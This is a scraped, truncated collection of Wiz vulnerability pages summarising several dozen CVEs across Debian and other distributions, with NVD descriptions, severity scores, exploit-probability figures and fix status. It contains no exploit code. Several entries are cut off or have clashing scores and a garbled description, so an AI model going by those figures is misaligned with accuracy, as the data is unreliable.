nfc_sock_crea
Wiz
CVE-2021-4456 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.5
CVE-2021-4456 [MEDIUM] CVE-2021-4456 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2021-4456 :
Linux Debian vulnerability analysis and mitigation
Net::CIDR versions before 0.24 for Perl mishandle leading zeros in IP CIDR addresses, which may have unspecified impact.
addr2cidr
cidrlookup
cidrvalidate
addr2cidr
cidrlookup
Source : NVD
## 6.5
Score
Published February 27, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 26
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
libnet-cidr-perl
perl-Net-CIDR
Sources
NVD
Debian 11, 12 Severity MEDIUM No Fix Added at: Mar 02, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 02, 2026
Echo Severity MEDI
Wiz
CVE-2025-63261 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.8
CVE-2025-63261 [HIGH] CVE-2025-63261 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-63261 :
Linux Debian vulnerability analysis and mitigation
AWStats 8.0 is vulnerable to Command Injection via the open function
Source : NVD
## 7.8
Score
Published March 20, 2026
Severity HIGH
CNA Score 7.8
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 19.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
awstats
Sources
NVD
Debian 11 Severity HIGH Has Fix Added at: Mar 21, 2026
Debian 12, 13, 14 Severity LOW No Fix Added at: Mar 21, 2026
Echo Severity HIGH No Fix Added at: Mar 21, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, n
Wiz
CVE-2025-67479 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67479 [MEDIUM] CVE-2025-67479 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67479 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation MediaWiki, Wikimedia Foundation Cite. This vulnerability is associated with program files includes/Parser/CoreParserFunctions.Php, includes/Parser/Sanitizer.Php.
This issue affects MediaWiki: from * before 1.39.14, 1.43.4, 1.44.1; Cite: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
E
Wiz
CVE-2025-71176 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.8
CVE-2025-71176 [MEDIUM] CVE-2025-71176 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-71176 :
Linux Debian vulnerability analysis and mitigation
pytest through 9.0.2 on UNIX relies on directories with the /tmp/pytest-of-{user} name pattern, which allows local users to cause a denial of service or possibly gain privileges.
Source : NVD
## 6.8
Score
Published January 22, 2026
Severity MEDIUM
CNA Score 6.8
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
python3.12-pytest
python39-pytest
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW No Fix Added at: Jan 23, 2026
Echo Severity MEDIUM No Fix Added at: Jan 23, 2026
Red Hat 7, 8, 9, 10
Wiz
CVE-2022-50813 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2022-50813 [MEDIUM] CVE-2022-50813 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50813 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
drivers: mcb: fix resource leak in mcb_probe()
When probe hook function failed in mcb_probe(), it doesn't put the device.
Compiled test only.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-aws-fips
linux-aws-hwe
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 31, 2025
Echo Has Fix Added at: Dec 31, 2025
Ubuntu 14.04, 22.04 Severity MEDIUM Has Fix Added at
Wiz
CVE-2026-21881 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-21881 [CRITICAL] CVE-2026-21881 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21881 :
Linux Debian vulnerability analysis and mitigation
Kanboard is project management software focused on Kanban methodology. Versions 1.2.48 and below is vulnerable to a critical authentication bypass when REVERSE_PROXY_AUTH is enabled. The application blindly trusts HTTP headers for user authentication without verifying the request originated from a trusted reverse proxy. An attacker can impersonate any user, including administrators, by simply sending a spoofed HTTP header. This issue is fixed in version 1.2.49.
Source : NVD
## 9.1
Score
Published January 8, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Linux Debian
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percent
Wiz
CVE-2026-23446 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23446 [MEDIUM] CVE-2026-23446 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23446 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: usb: aqc111: Do not perform PM inside suspend callback
syzbot reports "task hung in rpm_resume"
This is caused by aqc111_suspend calling
the PM variant of its write_cmd routine.
The simplified call trace looks like this:
rpm_suspend()
usb_suspend_both() - here udev->dev.power.runtime_status == RPM_SUSPENDING
aqc111_suspend() - called for the usb device interface
aqc111_write32_cmd()
usb_autopm_get_interface()
pm_runtime_resume_and_get()
rpm_resume() - here we call rpm_resume() on our parent
rpm_resume() - Here we wait for a status change that will never happen.
At this point we block another task which holds
rtnl_lock and locks up the whole
Wiz
CVE-2025-67481 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67481 [MEDIUM] CVE-2025-67481 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67481 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation MediaWiki. This vulnerability is associated with program files resources/src/mediawiki.JqueryMsg/mediawiki.JqueryMsg.Js.
This issue affects MediaWiki: from * before 1.39.16, 1.43.6, 1.44.3, 1.45.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: D
Wiz
CVE-2026-4750 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4750 [MEDIUM] CVE-2026-4750 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4750 :
Linux Debian vulnerability analysis and mitigation
Out-of-bounds Read vulnerability in fabiangreffrath woof.This issue affects woof: before woof_15.3.0.
Source : NVD
## 9.1
Score
Published March 24, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17.5
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
woof-doom
Sources
NVD
Debian 12, 13 Severity MEDIUM No Fix Added at: Mar 24, 2026
Debian 14 Severity CRITICAL Has Fix Added at: Mar 24, 2026
Echo Severity CRITICAL No Fix Added at: Mar 24, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your clo
Wiz
CVE-2026-23314 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23314 [MEDIUM] CVE-2026-23314 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23314 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
regulator: bq257xx: Fix device node reference leak in bq257xx_reg_dt_parse_gpio()
In bq257xx_reg_dt_parse_gpio(), if fails to get subchild, it returns
without calling of_node_put(child), causing the device node reference
leak.
Source : NVD
Published March 25, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux
Sources
NVD
Debian 14 Has Fix Added at: Mar 26, 2026
## Get a CVE risk assessment
Get a prioritized view of
Wiz
CVE-2025-61657 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-61657 [MEDIUM] CVE-2025-61657 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61657 :
Linux Debian vulnerability analysis and mitigation
Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in Wikimedia Foundation Vector. This vulnerability is associated with program files resources/skins.Vector.Js/stickyHeader.Js.
This issue affects Vector: from * before 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 13, 14 Has Fix Added at: Oct 05, 2025
## Get a CVE risk assessment
Get a
Wiz
CVE-2025-59023 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2025-59023 [HIGH] CVE-2025-59023 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-59023 :
Linux Debian vulnerability analysis and mitigation
Crafted delegations or IP fragments can poison cached delegations in Recursor.
Source : NVD
## 8.2
Score
Published February 9, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Linux Alpine
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.4
Exploitation Probability (EPSS) N/A
Affected packages and libraries
pdns-recursor
Sources
NVD
Alpine 3.22, edge Severity HIGH Has Fix Added at: Oct 23, 2025
Alpine 3.23 Severity HIGH Has Fix Added at: Dec 04, 2025
Debian 11, 12 Severity HIGH No Fix Added at: Oct 23, 2025
Debian 13, 14 Severity HIGH Has Fix Added at: Oct 23, 2025
Echo Severity HIGH Ha
Wiz
CVE-2026-2100 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-2100 [MEDIUM] CVE-2026-2100 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2100 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in p11-kit. A remote attacker could exploit this vulnerability by calling the C_DeriveKey function on a remote token with specific IBM kyber or IBM btc derive mechanism parameters set to NULL. This could lead to the RPC-client attempting to return an uninitialized value, potentially resulting in a NULL dereference or undefined behavior. This issue may cause an application level denial of service or other unpredictable system states.
Source : NVD
## 5.3
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
Linux Debian
Linux Fedora
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile
Wiz
CVE-2026-4426 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4426 [MEDIUM] CVE-2026-4426 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4426 :
Linux Debian vulnerability analysis and mitigation
pz_log2_bs
Source : NVD
## 6.5
Score
Published March 19, 2026
Severity MEDIUM
CNA Score 6.5
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 31.3
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bsdtar
libarchive-devel
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM No Fix Added at: Mar 20, 2026
Echo Severity MEDIUM No Fix Added at: Mar 20, 2026
Red Hat 6, 7, 8, 9, 10 Severity MEDIUM No Fix Added at: Mar 20, 2026
Red Hat 8 Severity MEDIUM Has Fix Added at: Mar 21, 2026
Ubuntu 16.04, 18.04, 20.04, 22.04, 24.04, 25.10 Severity MEDIUM No Fix
Wiz
CVE-2026-23474 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-23474 [MEDIUM] CVE-2026-23474 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23474 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
mtd: Avoid boot crash in RedBoot partition table parser
Given CONFIG_FORTIFY_SOURCE=y and a recent compiler,
commit 439a1bcac648 ("fortify: Use __builtin_dynamic_object_size() when
available") produces the warning below and an oops.
Searching for RedBoot partition table in 50000000.flash at offset 0x7e0000
------------[ cut here ]------------
WARNING: lib/string_helpers.c:1035 at 0xc029e04c, CPU#0: swapper/0/1
memcmp: detected buffer overflow: 15 byte read of buffer size 14
Modules linked in:
CPU: 0 UID: 0 PID: 1 Comm: swapper/0 Not tainted 6.19.0 #1 NONE
As Kees said, "'names' is pointing to the final 'namelen' many bytes
of the allocation ... 'n
Wiz
CVE-2026-23115 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.7
CVE-2026-23115 [MEDIUM] CVE-2026-23115 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23115 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
serial: Fix not set tty->port race condition
Revert commit bfc467db60b7 ("serial: remove redundant
tty_port_link_device()") because the tty_port_link_device() is not
redundant: the tty->port has to be confured before we call
uart_configure_port(), otherwise user-space can open console without TTY
linked to the driver.
This tty_port_link_device() was added explicitly to avoid this exact
issue in commit fb2b90014d78 ("tty: link tty and port before configuring
it as console"), so offending commit basically reverted the fix saying
it is redundant without addressing the actual race condition presented
there.
Reproducible always as tty->port warning on
Wiz
CVE-2026-23459 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-23459 [MEDIUM] CVE-2026-23459 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23459 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ip_tunnel: adapt iptunnel_xmit_stats() to NETDEV_PCPU_STAT_DSTATS
Blamed commits forgot that vxlan/geneve use udp_tunnel[6]_xmit_skb() which
call iptunnel_xmit_stats().
iptunnel_xmit_stats() was assuming tunnels were only using
NETDEV_PCPU_STAT_TSTATS.
@syncp offset in pcpu_sw_netstats and pcpu_dstats is different.
32bit kernels would either have corruptions or freezes if the syncp
sequence was overwritten.
This patch also moves pcpu_stat_type closer to dev->{t,d}stats to avoid
a potential cache line miss since iptunnel_xmit_stats() needs to read it.
Source : NVD
Published April 3, 2026
CNA Score N/A
Affected Technologies
Linux Debian
Linu
Wiz
CVE-2025-67478 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-67478 [MEDIUM] CVE-2025-67478 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-67478 :
Linux Debian vulnerability analysis and mitigation
Vulnerability in Wikimedia Foundation CheckUser. This vulnerability is associated with program files includes/Mail/UserMailer.Php.
This issue affects CheckUser: from * before 1.39.14, 1.43.4, 1.44.1.
Source : NVD
Published February 3, 2026
Severity NONE
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affected packages and libraries
mediawiki
Sources
NVD
Debian 11, 12, 13, 14 Has Fix Added at: Dec 12, 2025
Echo Has Fix Added at: Dec 12, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—s
Wiz
CVE-2022-50798 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2022-50798 [MEDIUM] CVE-2022-50798 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50798 :
Linux Debian vulnerability analysis and mitigation
Rejected reason: This candidate is a duplicate of CVE-2017-11359.
Source : NVD
Published December 30, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sox
Sources
NVD
Debian 11, 12, 13, 14 Severity HIGH Has Fix Added at: Dec 31, 2025
Echo Severity HIGH Has Fix Added at: Dec 31, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related Linux Debian vulnerabilities:
CVE ID
Severity
Wiz
CVE-2023-53854 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2023-53854 CVE-2023-53854 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2023-53854 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
ASoC: mediatek: mt8186: Fix use-after-free in driver remove path
When devm runs function in the "remove" path for a device it runs them
in the reverse order. That means that if you have parts of your driver
that aren't using devm or are using "roll your own" devm w/
devm_add_action_or_reset() you need to keep that in mind.
The mt8186 audio driver didn't quite get this right. Specifically, in
mt8186_init_clock() it called mt8186_audsys_clk_register() and then
went on to call a bunch of other devm function. The caller of
mt8186_init_clock() used devm_add_action_or_reset() to call
mt8186_deinit_clock() but, because of the intervening devm functions,
t
Wiz
CVE-2026-23079 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.5
CVE-2026-23079 [MEDIUM] CVE-2026-23079 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23079 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
gpio: cdev: Fix resource leaks on errors in lineinfo_changed_notify()
On error handling paths, lineinfo_changed_notify() doesn't free the
allocated resources which results leaks. Fix it.
Source : NVD
## 5.5
Score
Published February 4, 2026
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.9
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-hwe-6.17
linux-aws-fips
Sources
NVD
Debian 14 Severity MEDIUM Has Fix Added at: Feb 04, 2026
Ubuntu
Wiz
CVE-2026-35091 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-35091 [HIGH] CVE-2026-35091 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35091 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in Corosync. A remote unauthenticated attacker can exploit a wrong return value vulnerability in the Corosync membership commit token sanity check by sending a specially crafted User Datagram Protocol (UDP) packet. This can lead to an out-of-bounds read, causing a denial of service (DoS) and potentially disclosing limited memory contents. This vulnerability affects Corosync when running in totemudp/totemudpu mode, which is the default configuration.
Source : NVD
## 8.2
Score
Published April 1, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Proba
Wiz
CVE-2025-68225 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68225 [MEDIUM] CVE-2025-68225 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68225 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
lib/test_kho: check if KHO is enabled
We must check whether KHO is enabled prior to issuing KHO commands,
otherwise KHO internal data structures are not initialized.
Source : NVD
Published December 16, 2025
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
linux-azure-6.17
linux-gcp
Sources
NVD
Debian 14 Has Fix Added at: Dec 17, 2025
Ubuntu 24.04, 25.10 Severity MEDIUM Has Fix Added at: Dec 18, 2025
## Get a CV
Wiz
CVE-2026-0964 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.9
CVE-2026-0964 [MEDIUM] CVE-2026-0964 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-0964 :
Linux Debian vulnerability analysis and mitigation
A malicious SCP server can send unexpected paths that could make the
client application override local files outside of working directory.
This could be misused to create malicious executable or configuration
files and make the user execute them under specific consequences.
This is the same issue as in OpenSSH, tracked as CVE-2019-6111.
Source : NVD
## 5
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 5.0
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10
Exploitation Probability (EPSS) N/A
Affected packages and libraries
libssh4
libssh4-32bit
Sources
N
Wiz
CVE-2026-4980 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4980 [MEDIUM] CVE-2026-4980 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4980 :
Linux Debian vulnerability analysis and mitigation
A local file disclosure vulnerability in the XInclude processing component of Inkscape 1.1 before 1.3 allows a remote attacker to read local files via a crafted SVG file containing malicious xi:include tags.
Source : NVD
## 6.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 6.3
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 7.7
Exploitation Probability (EPSS) N/A
Affected packages and libraries
inkscape
inkscape1
Sources
NVD
Debian 12 Severity MEDIUM No Fix Added at: Mar 29, 2026
Debian 13, 14 Severity MEDIUM Has Fix Added at: Mar 29, 2026
Echo Sev
Wiz
CVE-2025-68338 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2025-68338 [MEDIUM] CVE-2025-68338 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68338 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
net: dsa: microchip: Don't free uninitialized ksz_irq
If something goes wrong at setup, ksz_irq_free() can be called on
uninitialized ksz_irq (for example when ksz_ptp_irq_setup() fails). It
leads to freeing uninitialized IRQ numbers and/or domains.
Use dsa_switch_for_each_user_port_continue_reverse() in the error path
to iterate only over the fully initialized ports.
Source : NVD
## 5.5
Score
Published December 23, 2025
Severity MEDIUM
CNA Score N/A
Affected Technologies
Linux Debian
Linux Ubuntu
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
CVE-2026-2625 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.0
CVE-2026-2625 [MEDIUM] CVE-2026-2625 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-2625 :
Linux Debian vulnerability analysis and mitigation
A flaw was found in rust-rpm-sequoia. An attacker can exploit this vulnerability by providing a specially crafted Red Hat Package Manager (RPM) file. During the RPM signature verification process, this crafted file can trigger an error in the OpenPGP signature parsing code, leading to an unconditional termination of the rpm process. This issue results in an application level denial of service, making the system unable to process RPM files for signature verification.
Source : NVD
## 4
Score
Published April 3, 2026
Severity MEDIUM
CNA Score 4.0
Affected Technologies
Linux Debian
Linux Red Hat
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabi
Wiz
CVE-2026-23267 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz
CVE-2026-23267 CVE-2026-23267 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23267 :
Linux Debian vulnerability analysis and mitigation
In the Linux kernel, the following vulnerability has been resolved:
f2fs: fix IS_CHECKPOINTED flag inconsistency issue caused by concurrent atomic commit and checkpoint writes
During SPO tests, when mounting F2FS, an -EINVAL error was returned from
f2fs_recover_inode_page. The issue occurred under the following scenario
Thread A Thread B
f2fs_ioc_commit_atomic_write
f2fs_do_sync_file // atomic = true
block_operations// writeback last_folio
f2fs_flush_nat_entries
: {struct nat_entry}->flag |= BIT(IS_CHECKPOINTED)
unblock_operations : f2fs_up_write(&sbi->node_write)
f2fs_write_checkpoint//return
: f2fs_do_write_node_page()
f2fs_ioc_commit_atomic_write//return
SPO
Thread A calls f2fs_need_dentry_mark(sbi, ino), an
Wiz
CVE-2022-50942 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2022-50942 [MEDIUM] CVE-2022-50942 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2022-50942 :
Echo vulnerability analysis and mitigation
Incinga Web 2.8.2 contains a client-side cross-site scripting vulnerability that allows remote attackers to inject malicious script codes through the icinga.min.js file. Attackers can exploit the EventListener.handleEvent method to execute arbitrary scripts, potentially leading to session hijacking and non-persistent phishing attacks.
Source : NVD
## 4.8
Score
Published February 1, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 15.7
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
icingaweb2
Sources
NVD
Echo Severity MEDIUM No Fix Added
Wiz
CVE-2025-61873 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 2.6
CVE-2025-61873 [LOW] CVE-2025-61873 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-61873 :
Linux Debian vulnerability analysis and mitigation
Best Practical Request Tracker (RT) before 4.4.9, 5.0.9, and 6.0.2 allows CSV Injection via ticket values when TSV export is used.
Source : NVD
## 2.6
Score
Published January 16, 2026
Severity LOW
CNA Score 2.6
Affected Technologies
Linux Debian
Echo
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
request-tracker4
request-tracker5
Sources
NVD
Debian 11, 12, 13, 14 Severity LOW Has Fix Added at: Oct 23, 2025
Echo Severity LOW Has Fix Added at: Nov 18, 2025
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so y
Wiz
CVE-2025-62600 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2025-62600 [HIGH] CVE-2025-62600 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-62600 :
Linux Debian vulnerability analysis and mitigation
Fast DDS is a C++ implementation of the DDS (Data Distribution Service) standard of the OMG (Object Management Group
). Prior to versions 3.4.1, 3.3.1, and 2.6.11, when the security mode is enabled, modifying the DATA Submessage within an
SPDP packet sent by a publisher causes an Out-Of-Memory (OOM) condition, resulting in remote termination of Fast-DDS. If t
he fields of PID_IDENTITY_TOKEN or PID_PERMISSION_TOKEN in the DATA Submessage — specifically by tampering with the length
field in readBinaryPropertySeq — are modified, an integer overflow occurs, leading to an OOM during the resize operation.
Versions 3.4.1, 3.3.1, and 2.6.11 patch the issue.
Source : NVD
## 1.7
Score
Published February 3, 2026
Severity
Wiz
CVE-2016-20038 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2016-20038 [HIGH] CVE-2016-20038 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2016-20038 :
Echo vulnerability analysis and mitigation
yTree 1.94-1.1 contains a stack-based buffer overflow vulnerability that allows local attackers to execute arbitrary code by supplying an excessively long argument to the application. Attackers can craft a malicious command-line argument containing shellcode and a return address to overwrite the stack and execute code in the application context.
Source : NVD
## 8.6
Score
Published March 28, 2026
Severity HIGH
CNA Score 8.6
Affected Technologies
Echo
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 4.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
ytree
Sources
NVD
Echo Severity HIGH No Fix Added
Wiz
